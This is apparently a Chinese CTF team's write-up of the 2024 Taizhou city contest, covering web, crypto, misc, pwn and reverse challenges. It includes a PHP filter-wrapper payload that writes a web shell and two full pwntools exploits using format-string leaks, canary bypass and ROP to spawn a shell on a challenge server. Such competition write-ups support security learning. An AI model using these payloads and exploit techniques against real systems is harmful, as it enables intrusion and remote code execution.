A1natas 2024 台州市赛 WriteUp

A1natas 2024 台州市赛 WriteUp

Web

DEAD OR ALIVE

php死亡绕过 php伪协议 url二次编码绕过一下

image-20241016122733802

这里开启了短tag rot47绕不过去

换成

php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=upload/shell.php
contents=?%3Chp%20phpipfn(o;)%3E?

得到flag

image-20241016122520194

几道菜呀

robotstxt 泄露前半flag

image-20241016122938977

后半flag变量覆盖 把flag污染到变量world里面

image-20241016123059656

Crypto

codemaster

爆破得到压缩包密码

hint里面看到压缩包密码

image-20241016123701666

听出来摩斯编码

01 0100 0100 011 111 010 101 01 10 100 10 111 0110 0100 01 1011 11 01 101 0 0111 01 1010 101 01 100

001 0100 0100 1000解码得到压缩包密码

ALLWORKANDNOPLAYMAKEJACKADULLBOY

得到flag

image-20241016124350133

简单的模运算

from Crypto.Util.number import *


n1 = 59291291447490366931525634934604732490686993375526804349191888372804657968568621876626267171031639542229776816809231575682674990669907844507573323062869697381007018170369953528533225693260962158277876389797698421883811693774623191453338343873376809325940622690724742325375260783954612111771505452790833107433
e1 = 1009
e2 = 661
c1 = 42985353077188042701858678659683858628193880095538312019081971299029326751867795460043384534976482867850898695817341887974850615883707385265375936859975562647458644154098813749248370155445911231152202411316142174083125556302740642264129017638217154099365335103116579136478977445028803457714891387414804454563
hint2 = 40507463249661310357827794806044375677878316124571340628557074423085821966799760539750240709046644351970536177027127843527257097695964926292300842488261880439240179761636200128317742727421272586463218228015921971356760958631902559531017704907319793768862467740343002694370348402368271531907359292269313167594
hint1 = 1271005879853316066661199285969179445258555468409602536767308127422453124456569166278548456389424001236622134198431700958874184560969387121822195176467698604581027381830540104701755158555395105056691597754287953054854072522855420859550987917092786677237411037800799757596145745139003994853090852244952501770

# Part 1: combine the two hints into a value that shares the factor p with n1.
# How hint1/hint2 were built is not shown here; presumably the challenge defines
# them so that hint1^e1 - e1^(e1*e2) * hint2^e2 is a multiple of p -- check the
# challenge source. (e1 and e2 only enter this relation; the ciphertext itself
# is decrypted below with exponent 65537, as the author ran it.)
p = GCD(n1, pow(hint1, e1) - pow(e1, e1 * e2) * pow(hint2, e2))

# RSA decryption modulo the single prime p.
m = pow(c1, inverse(65537, p - 1), p)
print(long_to_bytes(m))


n2 = 18907964900655384324579822409386633636878766956056871585535362235214353767231073564264059287914388330411792102199606677008933621408085966756951588469677351070820733406746369679198435269992553170199992317543151904463295431360000467944654613563212110648427484740736780335622922770497302516605477200091994280170659051797483082932715112295285374951466772664058673174457133774539371864037823431076085535646866492867565053211399132137624309571702027870497719709848105717638061824558263209029252939242634210549580025431343041421766587111257036497372428545483704784943228958032869014014563237034417269447643411742587366522581092247139356905151503074118950953726319892565456479517718514001822091970116274032235077283171573739409327260871369017093426482435098823654221146125974831336950435699141428482689352594911360748437075413924102074118643817682988301168832491421799525827632647293700871699768251822202064478207264310344710162587091114198326722398521534722836191900118919600325987668228334387274131745452370144048469165896152934265086085786170745300044244328435656038364921390878141315764940004361350568616343868964642155971232793094529961537868556317288317761237430569785361173933724010332338240102029231307867651913780873895463922404696220328907265969090667253011075715302423364798124784791540343259221981176571491275777227356362593241763735078774750032170810209648159443012857333801615838630780060716065099646497273032317098446052746729617067928763959393487041510168193671378036773409927475705441371588922269531683087325413686315760604906941830110671649667896262119795185372459800672732201403353796496975239081396680894282951703497436899157694531797901273547022181574313676236049710129802224469486290831758140772148263506850711301689866687921384434558768919627058698246307704127709329632785782812326088967419473252484748677712381933762265715476433475653
hint3 = 9939018467626296300864549557153960485816202060115441771858993139956001568094397129213688325169848929397519454556265038265085753791012239390847499832076142790537570688728474176390891119329028306138917962137940523721411683756694953004757356322832322272044727574511946615053360780724964403109981221038321150251912087095566788471973368735984926133539004913163814796547521685779553548417828006578689568287135076606657942555780079060666398892624634539284576783451146414121481315811210373744629102035041262128288541384833388244359092650525684510233998198648220188818529696044589322103131713532522087913277853687802387823370812184861308056607206704924142111163623647400386387795315156552323415775302567837608141240660791558895222250523472575523943334805729177781503647940132538364353380916295244903544529895988952519161034077133368918033027698840291604695794239996491625350827193007237672555853711676946280455422865857083520387962904612732978811244632662722516874510663815000407442709650546583427701935634421822920667340400344464560819496241832753100346158973730178944583819434570015364985334123682718945396012714833234814138060680879946683598382558581755464432848629830671740874556822495651590292355132309556201503702994218748824342270746121842337819752324099307642066174745872761074064496053960340396957873940843698476902239785513353538575271300199803656708789414583304212919858466476111752009816249691548012011325635726932007337584928654763601504911235883280784689919453164650180423494792012285026508211938647974660637499188015435581876228505538395991613265963363970634342709084117396030961729066498695271401095219781344237736883159601430790828530656828799412179649742014177933116928065839153385688599329261957525423958781720021524864279277040500534782586037303978447982579881703150864520067784227584088469267877647284326147128663307302461696049106379396
hint4 = 11497927853957540365332790665731275206952151206861039571536392062632509295957449992678521695139160324432572043863866571073273424766195027066994928026020365890447586873438730677930838694248463784234422970896904779315141100899548415386962349420861970235250438845409060098489028828677789310690303276268227293420117427555062211347687022376226002772552572846005575907377875069559346178573605837280707896716903996273437999304784804469148200034055401729899984732371826562249893238400736560876412526076698397150716407768045925783960626076975474775287357623238930181817744888057241082587725853888247069373763616410186825446631363893872367121719099675878971215427631753890480342562281509217650841316549477101278836516712239644946591434882047908159355119724740895836970093220436696609508084144405957119864577550601265078506824881563233145601502789276574964256487656042156050790935757687533400014492738943377035151940053902285169162559415884261670006407914345470020985548114750984409094762491065523701667910143102554492295526746294891248183460488516919232107982441935261002056298051839186448002917036315086702724337403007094283544108605752353892969499338937456927473502637574082273446631592875576206457590873417790534425052375523311069970894661662935504029122498888677579838832589434264156033809784824308541883139057067073172969579383284214906496081973100504512465134008311849499410830926217663692810810073433508445528894019031624950077917834721653995486872359322444973369269957808220204120434820049177595069822767774880891475045042506316778272385296785381694201967451988353025446019210309412684814041807087081841227290094176745748423008005181412793105824372881451510867905760386180468940263583834371726883151840358399349831450242497969453799407724511831157375792268531837507107779497339624673256413930993867285692700231244480782493119378673295412687014852050209
hint5 = 734693499178140709107482184121639881311481497449164451247514670640712514605734040224535011153519609835276802031782238154113623838563165860055971999265801692161249909520059287311664417036724025637099701450424590923727907132999019020950844342934742235333060614209179570928227493575110697506644022234765949969346518432653798426853947974772328105759741384608693269694

# Part 2: the hint differences share factors with n2, which is peeled apart by
# successive GCDs. The variable names follow the author's reading of the
# challenge (p2q2 presumably being a product of two of n2's primes) -- the
# hint construction itself is not visible here.
q2 = GCD(n2, hint3 - hint4)

print(q2)
p2q2 = GCD(n2, hint4 - q2 - hint3)
r = n2 // p2q2
print(r)
print(long_to_bytes((hint5 - 1) // r ** 2))

# DASCTF{0e88f0e0-f18d-11ee-a56a-38f3abddb69b}

Misc

大ping特ping

CTF-NetA一把梭

image-20241016112455975

鼠标不妙题

打开后是300个套娃压缩包,写脚本提取

import os
import zipfile
import uuid
import shutil

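def extract_all(zip_path, extract_to, root_directory):
    """Extract every file member of ``zip_path`` flat into ``extract_to``.

    Only the member's basename is used to build the destination, so entries
    carrying directory components or ``..`` cannot escape ``extract_to``
    (zip-slip). Each output name is prefixed with a fresh UUID so members
    sharing a basename do not overwrite each other. Directory entries
    (empty basename) are skipped.

    Encrypted members cannot be read without a password: ``zipfile`` raises
    ``RuntimeError`` from ``ZipFile.open()`` itself, so that call now sits
    inside the ``try``. Such members are reported and skipped and the
    remaining members are still extracted. (In the original the ``open()``
    call preceded the ``try``, so the handler could never run and the whole
    walk aborted on the first encrypted member.)

    No decompression-size bound is applied; use only on archives you trust.

    Args:
        zip_path: path of the archive to read.
        extract_to: directory that receives the extracted members.
        root_directory: accepted for signature compatibility; nothing is
            written there any more.
    """
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        for member in zip_ref.namelist():
            filename = os.path.basename(member)
            if not filename:
                # Directory entries end in '/', leaving an empty basename.
                continue
            target_path = os.path.join(extract_to, str(uuid.uuid4()) + "_" + filename)
            try:
                with zip_ref.open(member) as source, open(target_path, "wb") as target:
                    shutil.copyfileobj(source, target)
            except RuntimeError as exc:
                # Encrypted member (or bad password): its bytes cannot be
                # recovered here, so report it and carry on with the rest.
                print(f"skipped {member!r} in {zip_path}: {exc}")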

def recursive_unzip(directory, root_directory):
    """Unpack every ``.zip`` under ``directory``, recursing into what comes out.

    An archive ``x.zip`` is unpacked by ``extract_all`` into a sibling
    directory ``x`` (created if missing), and that directory is then walked
    the same way so nested archives are handled too. ``root_directory`` is
    passed straight through to ``extract_all``.
    """
    for current_dir, _subdirs, names in os.walk(directory):
        archive_names = [n for n in names if n.endswith('.zip')]
        for archive_name in archive_names:
            archive_path = os.path.join(current_dir, archive_name)
            stem, _ext = os.path.splitext(archive_name)
            destination = os.path.join(current_dir, stem)
            os.makedirs(destination, exist_ok=True)
            extract_all(archive_path, destination, root_directory)
            recursive_unzip(destination, root_directory)

if __name__ == "__main__":
    # The \\?\ prefix is the Windows extended-length path form; presumably
    # chosen because the deeply nested archives exceed the normal path limit.
    start_dir = r"\\?\C:\Users\67300\Downloads\11"
    recursive_unzip(start_dir, start_dir)

查看python的报错信息和使用everything直接得到最内层的文件

image-20241016121031728

image-20241016121119612

image-20241016121223773

每个压缩包下有一个.dic文件,应该密码就在这300个字典中

写python脚本提取这300个字典

import os
import zipfile
import shutil
import tempfile

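def extract_zip(zip_path, output_dir):
    """Collect every ``.dic`` file from ``zip_path`` and its nested archives into ``output_dir``.

    The archive is unpacked into a temporary directory that
    ``TemporaryDirectory`` removes when the ``with`` block exits, so only the
    ``.dic`` files survive (the explicit ``shutil.rmtree`` of the original was
    redundant). Nested ``.zip`` members are handled by a recursive call, each
    in its own temporary directory; every other member is ignored.

    Args:
        zip_path: archive to read.
        output_dir: existing directory that receives the ``.dic`` files. If a
            file of the same name already exists there, the outcome follows
            ``shutil.move`` (platform-dependent).

    Raises:
        RuntimeError: propagated from ``ZipFile.extractall`` when a member is
            encrypted and no password is set.
    """
    with zipfile.ZipFile(zip_path, 'r') as zip_ref, tempfile.TemporaryDirectory() as temp_dir:
        zip_ref.extractall(temp_dir)
        for root, _, files in os.walk(temp_dir):
            for file in files:
                file_path = os.path.join(root, file)
                if file.endswith('.zip'):
                    extract_zip(file_path, output_dir)
                elif file.endswith('.dic'):
                    shutil.move(file_path, os.path.join(output_dir, file))
                    print(f'Extracted {file} to {output_dir}')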

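# Directory holding the 300 archives, and the directory that collects the
# .dic wordlists found inside them.
zip_dir = 'C:/Users/67300/Downloads/鼠标不妙题/'
output_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111'

os.makedirs(output_dir, exist_ok=True)

# Each top-level archive is processed exactly once. The original loop
# repeated the same body twice, so every archive was unpacked and its .dic
# files moved a second time.
for filename in os.listdir(zip_dir):
    if filename.endswith('.zip'):
        zip_path = os.path.join(zip_dir, filename)
        extract_zip(zip_path, output_dir)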

将300个字典合并成1个,然后跑字典爆破密码

import os

output_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111'
combined_file_path = 'C:/Users/67300/Downloads/鼠标不妙题/combined.dic'

# Concatenate every .dic wordlist in output_dir into one file. A newline is
# appended after each source so the last entry of one list is never glued
# to the first entry of the next.
with open(combined_file_path, 'w', encoding='utf-8') as combined_file:
    dic_names = (name for name in os.listdir(output_dir) if name.endswith('.dic'))
    for dic_name in dic_names:
        dic_file_path = os.path.join(output_dir, dic_name)
        with open(dic_file_path, 'r', encoding='utf-8') as dic_file:
            combined_file.write(dic_file.read() + '\n')

print(f'All .dic files have been combined into {combined_file_path}')

image-20241016113045440

image-20241016113315654

看了一下f_几就嵌套几层,可以直接用everything一把梭,找到文件,每个文件是base64的一段

image-20241016113621322

image-20241016113824170

Pwn

book

from pwn import *
context.update(os = 'linux', arch = 'amd64', timeout = 5)
context.log_level = 'debug'
binary = './book'
elf = ELF(binary, checksec=False)
DEBUG = 0
if DEBUG:
    # Local run: use the libc pwntools resolves for the binary.
    libc = elf.libc
    p = process(binary)
else:
    # Remote run: symbols come from the libc shipped with the challenge.
    libc = ELF('./libc.so.6', checksec=False)
    host = '139.155.126.78'
    port = '31248'
    p = remote(host,port)


# I/O shorthands over the tube `p`, written as plain functions.
def sla(delim, data):
    return p.sendlineafter(delim, data)


def sa(delim, data):
    return p.sendafter(delim, data)


def s(data):
    return p.send(data)


def sl(data):
    return p.sendline(data)


def ru(delim, **kwargs):
    return p.recvuntil(delim, **kwargs)


def io():
    return p.interactive()

def cmd(idx):
    """Select menu entry ``idx`` at the ``>>`` prompt."""
    choice = str(idx).encode()
    sla(b">>", choice)

def fmt(payload):
    """Menu option 2: submit ``payload`` as the name and wait for the echo header."""
    cmd(2)
    name_prompt = b"name:\n"
    sa(name_prompt, payload)
    # The program prints the name back after this marker; the caller reads it.
    ru(b"name is:\n")

def attack(payload):
    """Menu option 3: send ``payload`` raw once the program asks for the write."""
    cmd(3)
    write_prompt = b"write\n"
    ru(write_prompt)
    s(payload)


def pwn():
    """Exploit flow for ./book.

    The name echo (option 2) is a format-string read/write: it is used once to
    print three stack slots (code address, libc address, canary) and once to
    write a value into the binary; the write in option 3 then overflows into
    the saved return address with the leaked canary kept intact.
    """
    # Three %p conversions, separated by '-', are read back below in order.
    fmt("%8$p-%19$p-%13$p")

    ru(b"0x")
    # 12 hex digits each for the two addresses; the subtracted constants are
    # the offsets of the leaked values inside the binary / libc.
    codebase = int(p.recvn(12), 16) - 0x14a0
    ru(b"0x")
    libc.address = int(p.recvn(12), 16) - 0x24083
    ru(b"0x")
    # 16 hex digits: the full 64-bit canary.
    canary = int(p.recvn(16), 16)

    system = libc.sym["system"]
    binsh = next(libc.search(b"/bin/sh"))
    success(f"libc: {libc.address:#x}")

    b = codebase + 0x4068
    pop_rdi_ret = codebase + 0x0000000000001503
    # One byte past 'pop rdi' is the bare 'ret', used for stack alignment.
    ret = pop_rdi_ret + 1

    # Format-string write of 0x200 to the word at codebase+0x4068. What that
    # global controls is not visible in this script -- presumably the length
    # limit of the later write (verify against the binary).
    pay = fmtstr_payload(6, {b : 0x200})
    fmt(pay)

    # 0x48 bytes of filler up to the canary, the canary itself, a saved rbp of
    # 0, then the chain: ret; pop rdi; "/bin/sh"; system.
    pay = b'a'*0x48 + p64(canary) + p64(0) + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)
    attack(pay)


    io()
pwn()

magic_fmt

from pwn import *
context.update(os = 'linux', arch = 'amd64', timeout = 5)
context.log_level = 'debug'
binary = './magic_fmt'
elf = ELF(binary, checksec=False)
DEBUG = 0
if DEBUG:
    # Local run: use the libc pwntools resolves for the binary.
    libc = elf.libc
    p = process(binary)
else:
    # Remote run: symbols come from the libc shipped with the challenge.
    libc = ELF('./libc.so.6', checksec=False)
    host = '139.155.126.78'
    port = '37023'
    p = remote(host,port)


# I/O shorthands over the tube `p`, written as plain functions.
def sla(delim, data):
    return p.sendlineafter(delim, data)


def sa(delim, data):
    return p.sendafter(delim, data)


def s(data):
    return p.send(data)


def sl(data):
    return p.sendline(data)


def ru(delim, **kwargs):
    return p.recvuntil(delim, **kwargs)


def io():
    return p.interactive()

def pwn():
    """Exploit flow for ./magic_fmt.

    Round one: an unterminated echo leaks a stack pointer, a controlled
    format string leaks a libc address and patches one byte. Round two: the
    ROP chain is placed on the stack and a second format string redirects
    execution into it. The exact stack layout the offsets below rely on is
    not visible in this script.
    """
    ru(b"possess\n")

    # Fill the buffer completely so the echo runs on into the bytes after it.
    pay = b'a'*0xe0
    s(pay)
    ru(b"can ")
    ru(b'a'*0xe0)

    # Six raw bytes padded to a qword: a stack pointer; +8 is the slot that
    # is later used as the write target.
    ret_addr = u64(p.recvn(6).ljust(8, b'\x00')) + 0x8
    success(f"ret: {ret_addr:#x}")

    ru(b"else?\n")
    pay = p64(ret_addr)

    s(pay)

    ru(b"have?\n")
    # %45$p prints an address that is treated as libc below. The %c width is
    # chosen so that, together with the 14 characters of that %p output, the
    # running count is 0x68 when %6$hhn stores its low byte through argument
    # 6 -- presumably the pointer just sent (confirm against the binary).
    pay = f"%45$p%{0x68-14}c%6$hhn".encode()
    s(pay)

    ru(b"magic:\n")
    ru(b"0x")
    # 12 hex digits; 0x29d90 is the offset of the leaked value inside libc.
    libc.address = int(p.recvn(12), 16) - 0x29d90
    pop_rdi_ret = libc.address + 0x000000000002a3e5
    # One byte past 'pop rdi' is the bare 'ret', used for stack alignment.
    ret = pop_rdi_ret + 1
    system = libc.sym["system"]
    binsh = next(libc.search(b"/bin/sh"))
    success(f"libc: {libc.address:#x}")

    # Stack pointer derived from the leak; only its low 16 bits are used below.
    rsp = ret_addr - 0x118


    ru(b"possess\n")
    # Second round: the leaked pointer followed by the chain
    # ret; pop rdi; "/bin/sh"; system.
    pay = p64(ret_addr) + fit(ret, pop_rdi_ret, binsh, system)
    s(pay)

    # The same bytes are sent again at the second prompt.
    sa(b"else?", pay)

    ru(b"have?\n")

    # Positional argument index of the slot written with %hn below; how it was
    # found is not shown here.
    rbp_offset = 34

    # Two writes: 0x8b as a byte through argument 6, then the width of the
    # second %c brings the count up to rsp & 0xffff, which %hn stores as a
    # half-word into argument 34.
    pay = f"%{0x8B}c%6$hhn%{(rsp&0xffff) - 0x8b}c%{rbp_offset}$hn".encode()
    # gdb.attach(p, "bbase 0x1327")
    s(pay)

    io()
pwn()

Reverse

easy_choice

#include <stdio.h>
#include <stdlib.h>
#define delta 0x9e3779b9

/*
 * Undo one block-cipher pass over the n-word block v, in place, with the
 * 4-word key. The round count (6 + 52/n), the starting sum (rounds*delta,
 * stepping down each round) and the mixing term all match the reference
 * btea/XXTEA decryption loop, so this is the decrypt direction.
 */
static void btea_decrypt(unsigned int *v, int n, const unsigned int *key)
{
    unsigned int y, z, sum, e, p;
    unsigned int rounds = 6 + 52 / n;

    sum = rounds * delta;
    y = v[0];
    do {
        e = (sum >> 2) & 3;
        for (p = n - 1; p > 0; p--) {
            z = v[p - 1];
            v[p] -= ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4)))
                     ^ ((key[(p & 3) ^ e] ^ z) + (y ^ sum)));
            y = v[p];
        }
        /* p is 0 here, so key[(p ^ e) & 3] selects key[e]. */
        z = v[n - 1];
        v[0] -= (((key[(p ^ e) & 3] ^ z) + (y ^ sum))
                 ^ (((y << 2) ^ (z >> 5)) + ((z << 4) ^ (y >> 3))));
        y = v[0];
        sum -= delta;
    } while (--rounds);
}

/*
 * Decrypt the eight hard-coded words two at a time -- first with key, then
 * with key2 -- and write the result to stdout as raw bytes in memory order.
 */
int main(void)
{
    unsigned int w[8] = {0xAC3A28FD, 0x2331590C, 0x329F681B, 0xA6CF62DB, 0x8738A413, 0x44D27414, 0xDEF3A4CD, 0x5B22BA91}; /* ciphertext; can be changed */
    unsigned int key[4] = {0x41, 0x53, 0x43, 0x54};  /* 'A','S','C','T' as word values */
    unsigned int key2[4] = {0x54, 0x4f, 0x44, 0x41}; /* 'T','O','D','A' */
    int block_words = 2;
    int o;

    for (o = 0; o < 4; o++) {
        unsigned int *block = &w[2 * o];
        btea_decrypt(block, block_words, key);
        btea_decrypt(block, block_words, key2);
    }

    /* Same bytes as printing each word byte by byte with %c. */
    fwrite(w, 1, sizeof w, stdout);
    return 0;
}